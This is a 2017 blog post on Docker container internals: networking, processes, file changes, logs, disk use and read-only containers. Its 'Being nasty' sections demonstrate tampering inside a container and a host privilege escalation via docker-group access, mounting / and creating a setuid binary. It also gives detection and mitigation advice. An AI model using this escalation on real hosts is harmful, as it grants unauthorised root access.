Looking at how a Docker container runs

24 Jun 2017, 09:53


In the previous entry we looked at how a Docker container image is built.

In this entry we’re going to look a little at how a container runs.

Let’s take another look at the container we built last time, running apache:

% cat Dockerfile
FROM centos

RUN yum -y update
RUN yum -y install httpd

CMD ["/usr/sbin/httpd","-DFOREGROUND"]

% docker build -t web-server .

% docker run --rm -d -p 80:80 -v $PWD/web_base:/var/www/html \
-v /tmp/weblogs:/var/log/httpd web-server
63250d9d48bb784ac59b39d5c0254337384ee67026f27b144e2717ae0fe3b57b

% docker ps
CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS                NAMES
63250d9d48bb        web-server          "/usr/sbin/httpd -..."   2 minutes ago       Up 2 minutes        0.0.0.0:80->80/tcp   modest_shirley

So how does network traffic get into this container? And what does that -p flag mean?

Basic Docker networking

By default, Docker creates a bridge called docker0. This bridge is not connected to the primary network, so nothing outside the host can talk directly to containers on it. The bridge is associated with a private network.

When a container starts up, it is given a virtual ethernet (veth) device that allows for IP communication between the host and the container. Inside the container it looks just like a normal network device.

This veth device is added to the bridge, and an IP address is assigned to the container.

With our test Apache container we can see how this looks:

% brctl show
bridge name     bridge id               STP enabled     interfaces
docker0         8000.024234e17ca9       no              veth336564a

% ip -4 addr show dev docker0
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP
    inet 172.17.0.1/16 scope global docker0
       valid_lft forever preferred_lft forever

%  docker inspect --format='{{ .NetworkSettings.IPAddress }}' modest_shirley
172.17.0.2

So we can see our container’s “veth” device is on the bridge. The bridge itself has an IP address (172.17.0.1) on a /16 network (allowing for 65k addresses). Our container has an address 172.17.0.2 on this network.

We’ve effectively created a private network, 172.17.0.0/16; the host acts as the default gateway for the containers.
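As a quick check of the “65k addresses” figure, here is a minimal sketch of the arithmetic. The function name addresses_in_prefix is just something made up for this illustration.

```shell
#!/bin/sh
# Number of addresses in an IPv4 network with the given prefix length.
# A /16 leaves 32 - 16 = 16 host bits, so 2^16 addresses.
addresses_in_prefix() {
  echo $(( 1 << (32 - $1) ))
}

addresses_in_prefix 16   # the docker0 network; prints 65536
```

A couple of those addresses are not usable by containers (the bridge itself holds 172.17.0.1, for example), so treat this as an upper bound.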

Now, of course, the rest of your network (other hosts, etc.) does not know how to reach this private network, so a set of iptables rules is created so that outgoing traffic from the container is NAT’d to the host’s IP address. In this way containers can reach out to the main network.

Incoming traffic needs to be port forwarded, and this is set up with the -p flag; you can specify a port on the host and the port on the container it should move to. So -p 80:80 means forward port 80 from the host to port 80 inside the container.
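If you want to ask Docker which host port ended up forwarding to a container port, the docker port subcommand reports it. The wrapper below is only a sketch; host_port_for is a hypothetical helper name, and it assumes the bindings are printed in the usual address:port form.

```shell
#!/bin/sh
# Print the host port(s) that forward to a given container port.
# Usage: host_port_for CONTAINER PORT[/PROTO]
host_port_for() {
  # "docker port" prints bindings such as "0.0.0.0:80";
  # keep only what follows the last colon and drop duplicates.
  docker port "$1" "$2" | sed 's/.*://' | sort -u
}
```

For the container above, host_port_for modest_shirley 80/tcp should report the host side of the -p 80:80 mapping.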

It gets a little messy handling traffic from the outside network to the container, traffic between containers, and traffic from the container to itself, so Docker uses both a docker-proxy process and iptables rules:

% ps -ef | grep docker-proxy
root     10054   760  0 10:18 ?        00:00:00 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 80 -container-ip 172.17.0.2 -container-port 80

% sudo iptables -v -t nat -L POSTROUTING
Chain POSTROUTING (policy ACCEPT 11 packets, 754 bytes)
 pkts bytes target     prot opt in     out     source               destination         
   78  4961 MASQUERADE  all  --  any    !docker0  172.17.0.0/16        anywhere            
    0     0 MASQUERADE  tcp  --  any    any     172.17.0.2           172.17.0.2           tcp dpt:http

% sudo iptables -v -t nat -L DOCKER     
Chain DOCKER (2 references)
 pkts bytes target     prot opt in     out     source               destination         
    0     0 RETURN     all  --  docker0 any     anywhere             anywhere            
    0     0 DNAT       tcp  --  !docker0 any     anywhere             anywhere             tcp dpt:http to:172.17.0.2:80

Exercise for those following along at home: see what other rules are in the complete iptables output, including the main FORWARD chain.

This is just the default; it can be changed!

Container processes

With the CMD entry we told the Docker daemon to start this container by running the httpd process. We know Apache creates a number of child processes. We can see this, pretty easily:

% docker top modest_shirley
UID                 PID                 PPID                C                   STIME               TTY                 TIME                CMD
root                6458                6442                0                   14:08               ?                   00:00:00            /usr/sbin/httpd -DFOREGROUND
apache              6471                6458                0                   14:08               ?                   00:00:00            /usr/sbin/httpd -DFOREGROUND
apache              6472                6458                0                   14:08               ?                   00:00:00            /usr/sbin/httpd -DFOREGROUND
apache              6473                6458                0                   14:08               ?                   00:00:00            /usr/sbin/httpd -DFOREGROUND
apache              6474                6458                0                   14:08               ?                   00:00:00            /usr/sbin/httpd -DFOREGROUND
apache              6475                6458                0                   14:08               ?                   00:00:00            /usr/sbin/httpd -DFOREGROUND

Note the PIDs are those seen from the host. When we go inside the container, later, we’ll see the PID numbers look different.

Container files

The normal running of a program like Apache causes temporary files to be generated (e.g. the PID file, at the very least). Your app may make use of /tmp, /run, or other areas.

By default, running Docker containers are transient; when you shut them down, their changes are lost. But while they’re running we can see which files have changed:

% docker diff modest_shirley
C /run
A /run/mount
A /run/mount/utab
C /run/httpd
A /run/httpd/httpd.pid
A /run/httpd/authdigest_shm.1

Note the log files don’t show because they’re not part of the container’s filesystem; they were written to a mounted volume (the -v flag).

Going inside the container

We’ve seen some ways of looking at a container from the outside, using the docker top and docker diff commands. But what does the container look like from the inside? We can use docker exec to run a command. (Under the hood, the new process joins the existing container’s namespaces, but you can think of it as simply running a new process inside the container.)

The filesystem from inside

% docker exec -it modest_shirley /bin/sh
sh-4.2# ls
anaconda-post.log  dev   lib         media  proc  sbin  tmp
bin                etc   lib64       mnt    root  srv   usr
boot               home  lost+found  opt    run   sys   var

The filesystem looks like a normal CentOS one.

sh-4.2# df -h
Filesystem        Size  Used Avail Use% Mounted on
/dev/mapper/docker-252:1-131082-0940ddeec345786e6a77a45645d662721d239266ede70f2620b21d4abe11ad0d
                   10G  355M  9.7G   4% /
tmpfs             245M     0  245M   0% /dev
tmpfs             245M     0  245M   0% /sys/fs/cgroup
/dev/mapper/dockerce-fs                                                         
                  8.8G   23M  8.3G   1% /etc/hosts
shm                64M     0   64M   0% /dev/shm
/dev/vda3         3.0G  1.6G  1.3G  56% /var/log/httpd
tmpfs             245M     0  245M   0% /sys/firmware

If you look carefully, you can see some “data leakage”. For example, the /var/log/httpd mount has exposed the underlying host device /dev/vda3 (which is where /tmp lives on my test machine). The root disk shows how much space I allocated to the Docker data volume.

Other data may be exposed, eg via the dmesg command

sh-4.2# dmesg | grep Hypervisor
[    0.000000] Hypervisor detected: KVM

We can see that Docker, in its default setup, doesn’t hide as much of the host machine as we might like! That’s the consequence of a virtualised OS, as opposed to virtualised hardware.

Processes from inside

sh-4.2# ps -ef
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 14:08 ?        00:00:00 /usr/sbin/httpd -DFOREGROUND
apache       5     1  0 14:08 ?        00:00:00 /usr/sbin/httpd -DFOREGROUND
apache       6     1  0 14:08 ?        00:00:00 /usr/sbin/httpd -DFOREGROUND
apache       7     1  0 14:08 ?        00:00:00 /usr/sbin/httpd -DFOREGROUND
apache       8     1  0 14:08 ?        00:00:00 /usr/sbin/httpd -DFOREGROUND
apache       9     1  0 14:08 ?        00:00:00 /usr/sbin/httpd -DFOREGROUND
root        27     0  1 14:22 ?        00:00:00 /bin/sh
root        31    27  0 14:22 ?        00:00:00 ps -ef

Note the PIDs; the container has its own PID namespace and so our first Apache process now shows as PID 1. Recall, from earlier, that it showed as 6458 in the docker top output.
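On kernels that expose it (the NSpid line in /proc/<pid>/status arrived in Linux 4.1, so an older distribution kernel may not have it), the host can map its own view of a PID to the one inside the container. This is a small sketch; innermost_pid is a name invented here.

```shell
#!/bin/sh
# Read the text of /proc/<pid>/status on stdin and print the PID the
# process has in its innermost PID namespace (the last NSpid field).
# The NSpid line lists the PID in each nested namespace, outermost first.
innermost_pid() {
  awk '$1 == "NSpid:" { print $NF }'
}
```

On the host, something like innermost_pid < /proc/6458/status would be expected to report the container-side PID of our first httpd process, assuming the kernel provides the field.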

Networking from inside

This image doesn’t have an ip or ifconfig command inside, but if it did (or if we copied it in) then the output would look something like:

4: eth0@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP  link-netnsid 0
    inet 172.17.0.2/16 scope global eth0
       valid_lft forever preferred_lft forever

Similarly the routing table would look like

Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
0.0.0.0         172.17.0.1      0.0.0.0         UG        0 0          0 eth0
172.17.0.0      0.0.0.0         255.255.0.0     U         0 0          0 eth0

So we can see it shows as a normal network interface, with a default route to the bridge IP address.
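Even without ip or ifconfig in the image, the kernel’s own routing table is readable at /proc/net/route. The sketch below decodes the default gateway from it. It assumes a little-endian machine (such as x86), where the hex address is stored byte-reversed, and default_gateway is a hypothetical helper name.

```shell
#!/bin/sh
# Read /proc/net/route formatted text on stdin and print the default
# gateway as a dotted quad. Assumes little-endian hex (e.g. 010011AC).
default_gateway() {
  # The default route is the row whose Destination column is all zeros.
  hex=$(awk 'NR > 1 && $2 == "00000000" { print $3; exit }')
  [ -n "$hex" ] || return 1
  # Bytes are stored in reverse order, so the last hex pair is the first octet.
  printf '%d.%d.%d.%d\n' \
    "0x$(printf '%s' "$hex" | cut -c7-8)" \
    "0x$(printf '%s' "$hex" | cut -c5-6)" \
    "0x$(printf '%s' "$hex" | cut -c3-4)" \
    "0x$(printf '%s' "$hex" | cut -c1-2)"
}
```

From the host this could be used as docker exec modest_shirley cat /proc/net/route | default_gateway.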

Output from a Docker container

A program may send output to stdout or stderr. In a normal VM this might be considered the equivalent of the console. Docker allows us to inspect this as well. Let’s create a simple container that just writes out a line once a second:

#!/bin/sh
# Print a timestamped greeting once a second, forever.
while true
do
  echo "Hello, the time is $(date)"
  sleep 1
done

Let’s run this:

% docker run --rm -d timeloop 
c03f1a63e4c7e55ab37c973a2fe231621340c48aae633865049f2588168b1c1e

% docker ps
CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES
c03f1a63e4c7        timeloop            "/hello"            7 seconds ago       Up 2 seconds                            eloquent_torvalds

% docker logs eloquent_torvalds
Hello, the time is Sat Jun 24 14:55:19 UTC 2017
Hello, the time is Sat Jun 24 14:55:20 UTC 2017
Hello, the time is Sat Jun 24 14:55:21 UTC 2017
Hello, the time is Sat Jun 24 14:55:22 UTC 2017

Docker supports different logging drivers; we can see which one the container is using:

% docker inspect -f '{{.HostConfig.LogConfig.Type}}' eloquent_torvalds
json-file

This is the default driver, and by default it places no limit on log size, so it can fill up the disk!
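The json-file driver accepts max-size and max-file options to rotate the log. Here is a minimal sketch of passing them at run time; run_with_log_limits is a made-up wrapper, and the 10m and 3 values in the usage note are arbitrary examples rather than recommendations.

```shell
#!/bin/sh
# Start a detached container whose json-file log is size-limited and rotated.
# Usage: run_with_log_limits MAX_SIZE MAX_FILES IMAGE
run_with_log_limits() {
  docker run --rm -d \
    --log-driver json-file \
    --log-opt "max-size=$1" \
    --log-opt "max-file=$2" \
    "$3"
}
```

For example, run_with_log_limits 10m 3 timeloop would keep at most three log files of roughly 10 MB each for that container.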

Being nasty

We’ve seen enough in this blog entry to see how we can be nasty. If you look closely, you’ll notice that when we did docker exec we were root inside the container. We can abuse this!

sh-4.2# rpm -e passwd
sh-4.2# cat > /bin/passwd
echo Hahahahaha
sh-4.2# chmod 755 /bin/passwd
sh-4.2#

OK, that’s not much of an abuse, but it shows we can make changes.

Fortunately we can detect this type of abuse:

% docker diff modest_shirley
C /root
A /root/.bash_history
[ ... ]
C /etc
C /etc/pam.d
D /etc/pam.d/passwd
C /var
C /var/lib
C /var/lib/rpm
[ ... ]
C /usr/bin
C /usr/bin/passwd
[ ... ]

If we know what files should change (the /tmp and /run files?) then we may be able to use this for intrusion detection (only if filesystem artifacts are left behind) and File Integrity Monitoring (FIM).
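A crude version of that check is to filter the docker diff output against a list of directories we expect to change. This is only a sketch: the allowed list (/run and /tmp) is an assumption for this Apache example, and unexpected_changes is a name invented here.

```shell
#!/bin/sh
# Read "docker diff" output on stdin and print only the entries that fall
# outside the directories we expect to change (/run and /tmp here).
unexpected_changes() {
  # Each line is a change type (A, C or D), a space, then an absolute path.
  # "|| true" keeps the exit status clean when nothing is left to print.
  grep -Ev '^[ACD] /(run|tmp)(/|$)' || true
}
```

Used as docker diff modest_shirley | unexpected_changes, an empty result means only the expected areas were touched; anything printed is worth a closer look.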

Changes are transient

If we destroy and recreate this container then those changes are lost, and a new container starts from the “virgin” image.

% docker kill modest_shirley
modest_shirley

% docker run --rm -d -p 80:80 -v $PWD/web_base:/var/www/html -v /tmp/weblogs:/var/log/httpd web-server
2118033d42f2fe6bfe10861e838adb7a5df0c408431ba070d77ff6fa213ff45d

% docker ps
CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS                NAMES
2118033d42f2        web-server          "/usr/sbin/httpd -..."   3 seconds ago       Up 3 seconds        0.0.0.0:80->80/tcp   compassionate_liskov

% docker diff compassionate_liskov
C /run
C /run/httpd
A /run/httpd/authdigest_shm.1
A /run/httpd/httpd.pid

This is useful for recovering from a broken container, but it loses a potentially useful audit trail (which could hamper incident response).

Keeping changes after termination

We can keep terminated containers by not using the --rm flag, but this will start using up disk space.

To demonstrate this I created a simple container that just creates three files and terminates (by now you should be able to do this yourself, so I won’t show the Dockerfile or script).

We’ll run it without the --rm flag:

% docker image ls change
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
change              latest              7627c3a09d4e        30 minutes ago      124 MB

% docker run change

% docker ps
CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES

The container doesn’t show in the ps listing. We need to use an additional flag to show these terminated containers:

% docker ps -a
CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS                     PORTS               NAMES
b216fbcca2c0        change              "/hello"            7 seconds ago       Exited (0) 6 seconds ago                       naughty_sinoussi

There it is!

Because the results have been kept around we can inspect it and even pull the contents.

% docker diff naughty_sinoussi
C /tmp
A /tmp/testfile2
C /run
A /run/testfile3
A /testfile1

% docker cp naughty_sinoussi:/tmp/testfile2 - | tar tvf -
-rw-r--r-- 0/0              29 2017-06-09 14:40 testfile2

% docker cp naughty_sinoussi:/tmp/testfile2 - | tar xOf - testfile2
I am modifying a file in tmp

The docker cp command is useful; it can be used to extract files and directories from a container (or push them in!). When the destination is -, as here, the output is a tar stream. You can do this on running containers as well.
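When you give docker cp a real path instead of -, it copies the file directly with no tar involved. The two wrappers below sketch both directions; the function names are hypothetical.

```shell
#!/bin/sh
# Copy a path out of a container onto the host.
# Usage: pull_from_container CONTAINER SRC_PATH DEST_PATH
pull_from_container() {
  docker cp "$1:$2" "$3"
}

# Copy a host path into a container.
# Usage: push_to_container SRC_PATH CONTAINER DEST_PATH
push_to_container() {
  docker cp "$1" "$2:$3"
}
```

For instance, pull_from_container naughty_sinoussi /tmp/testfile2 ./testfile2 would leave a plain copy of the file in the current directory.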

Finally we can clear this up:

% docker rm naughty_sinoussi
naughty_sinoussi

Disk space used

Obviously keeping these changes (and “console” log output) around takes up disk space. But how much?

Let’s start with a clean system:

% docker info | grep Space.Used
 Data Space Used: 840.2 MB
 Metadata Space Used: 1.217 MB

% docker system df
TYPE                TOTAL               ACTIVE              SIZE                RECLAIMABLE
Images              10                  0                   660.8 MB            660.8 MB (100%)
Containers          0                   0                   0 B                 0 B
Local Volumes       0                   0                   0 B                 0 B

Now let’s run the docker run change command 100 times (obviously by cheating and running it in a loop).
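The loop can be as simple as the following sketch (run_n_times is just an illustrative name):

```shell
#!/bin/sh
# Run an image N times, one container after another, without --rm
# so that every exited container is kept.
# Usage: run_n_times COUNT IMAGE
run_n_times() {
  i=0
  while [ "$i" -lt "$1" ]; do
    docker run "$2"
    i=$((i + 1))
  done
}
```

Here that would be run_n_times 100 change.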

Now how much space is used?

 Data Space Used: 1.45 GB
 Metadata Space Used: 6.554 MB

Images              10                  1                   660.8 MB            660.8 MB (99%)
Containers          100                 0                   8.8 kB              8.8 kB (100%)
Local Volumes       0                   0                   0 B                 0 B

Now I know my script changes around 88 bytes of data inside the container. The docker system df command shows only an 8.8 kB increase in size (which matches 88 bytes changed in each of 100 containers), but the docker info command shows usage has grown by over 600 MB.
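To put numbers on that, here is the arithmetic as a small sketch. It assumes decimal units (so 1.45 GB is treated as 1450 MB) and works from the rounded figures shown above, so the result is approximate; growth_per_container is a made-up helper.

```shell
#!/bin/sh
# What "docker system df" reports: bytes changed per container x containers.
echo $(( 88 * 100 ))   # prints 8800, i.e. 8.8 kB

# Average growth in MB per container, from "Data Space Used" before and after.
# Usage: growth_per_container BEFORE_MB AFTER_MB COUNT
growth_per_container() {
  awk -v before="$1" -v after="$2" -v n="$3" \
    'BEGIN { printf "%.1f\n", (after - before) / n }'
}

growth_per_container 840.2 1450 100   # prints 6.1
```

So each kept container costs on the order of 6 MB of backing storage on this setup, even though it only changed 88 bytes of file data.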

Important note: the docker system df command is slow with so many terminated containers.

This gives us the ability to create a management process around running containers. For example, we could start them without the --rm flag. Periodically, while they run, we can check the docker diff results, and if something looks bad we can alert the SOC and potentially terminate the container. Similarly, on container termination we can check the diff results; if they look clean we can rm the container to recover disk space, or else retain it for forensic analysis.
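The termination half of that process might be sketched as below. It is illustrative only: the idea that changes under /tmp and /run count as “clean” is an assumption for this example, sweep_exited is a hypothetical name, and a real version would raise an alert rather than just print a line.

```shell
#!/bin/sh
# For every exited container: remove it if its filesystem changes are all
# under /tmp or /run, otherwise keep it for forensic analysis.
sweep_exited() {
  docker ps -a --filter status=exited --format '{{.Names}}' |
  while read -r name; do
    # Anything left after filtering out the expected paths is suspicious.
    changes=$(docker diff "$name" </dev/null |
      grep -Ev '^[ACD] /(tmp|run)(/|$)' || true)
    if [ -z "$changes" ]; then
      docker rm "$name" >/dev/null </dev/null && echo "removed $name"
    else
      echo "retained $name"
    fi
  done
}
```

Run from cron or a similar scheduler, this would keep disk usage down while preserving any container that did something unexpected.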

Read-only containers

There’s another way of running Docker that can help protect against modification: use the --read-only flag. With this the whole filesystem is made immutable. Now your normal app requires some temporary space; we can do this with --tmpfs. Annoyingly the permissions on /run may not be correct, so we can create a simple startup wrapper.

Going back to our Apache example, we build it the same way but with a startup wrapper instead:

% cat startup
#!/bin/sh
mkdir -m 0777 /run/httpd
exec /usr/sbin/httpd -DFOREGROUND

% cat Dockerfile
FROM centos
RUN  yum -y update
RUN  yum -y install httpd
ADD /startup /
CMD ["/startup"]

% docker build -t readonly-web .

% docker run -d --rm --read-only -p80:80 -v $PWD/web_base:/var/www/html:ro -v /tmp/weblogs:/var/log/httpd --tmpfs /run --tmpfs /tmp readonly-web

Note the :ro on the /var/www/html directory to make the HTML tree immutable as well, and that /run and /tmp are set up as tmpfs directories.
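To confirm from the outside that a container really was started with --read-only, docker inspect reports a ReadonlyRootfs flag under HostConfig. The helper below is a sketch with an invented name.

```shell
#!/bin/sh
# Succeed (exit 0) if the named container has a read-only root filesystem.
# Usage: is_read_only CONTAINER
is_read_only() {
  [ "$(docker inspect -f '{{.HostConfig.ReadonlyRootfs}}' "$1")" = "true" ]
}
```

It can be used in a condition, for example: is_read_only f17484a0529f && echo "root filesystem is read-only".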

If we try to make changes inside the container they fail, but the web server can still write out its logs:

% docker exec -it f17484a0529f /bin/sh
sh-4.2# touch /foo
touch: cannot touch '/foo': Read-only file system

sh-4.2# rpm -e passwd
error: can't create transaction lock on /var/lib/rpm/.rpm.lock (Read-only file system)

sh-4.2# touch /tmp/foo

sh-4.2# touch /var/www/html/bar
touch: cannot touch '/var/www/html/bar': Read-only file system

sh-4.2# tail -1 /var/log/httpd/error_log
[Mon Jun 12 17:01:11.024721 2017] [core:notice] [pid 1] AH00094: Command line: '/usr/sbin/httpd -D FOREGROUND'

A bit of a gotcha, here, is that docker diff shows no files have changed, which may hide intrusion indicators! We’ve been inside the container and looked around, but no history file was generated. This may be a small price for preventing abuse in the first place.

Being nasty outside the container

We can take what we’ve learned and use that to break into the host.

For example, we could map the root directory!

% docker run --rm -it -v /:/mnt centos /bin/sh
sh-4.2# cp /bin/id /mnt/tmp/badperson
sh-4.2# chmod 4711 /mnt/tmp/badperson
sh-4.2# exit
exit

% id
uid=500(sweh) gid=500(sweh) groups=500(sweh),499(docker)

% /tmp/badperson
uid=500(sweh) gid=500(sweh) euid=0(root) groups=500(sweh),499(docker)

Note the euid has changed.

If you give a normal user permission to run the docker command (which, basically, means being in the docker group) then they have effective root on the whole machine.

SELinux can mitigate this, to some extent, by preventing the container from having permissions to modify stuff. Indeed, I had to disable SELinux to do this test. These security features are there for a reason, but sometimes they’re disabled.

The best defense is to not allow people to be in the docker group in the first place!
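A first step is simply knowing who is in that group. The sketch below parses a group database entry; group_members is a hypothetical helper, and it only sees supplementary members listed in the fourth field, so a user whose primary group is docker would not show up.

```shell
#!/bin/sh
# Read a group entry (name:password:gid:member,member,...) on stdin
# and print one member per line.
group_members() {
  cut -d: -f4 | tr ',' '\n' | sed '/^$/d'
}
```

On most Linux systems this could be fed with getent group docker | group_members.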

Summary

In this blog entry we’ve looked at the running container:

Networking, processes, and file changes
Container stdout/stderr logs
Abusing Docker privileges (root exploit!)
- How we can detect this
- Some protections we can apply against it

Docker also has a lot of advanced security functions (SELinux, AppArmor, seccomp, capabilities) which can protect the system and the application. These are beyond the scope of this “basics” blog entry, but are definitely something an enterprise user of Docker needs to be aware of.
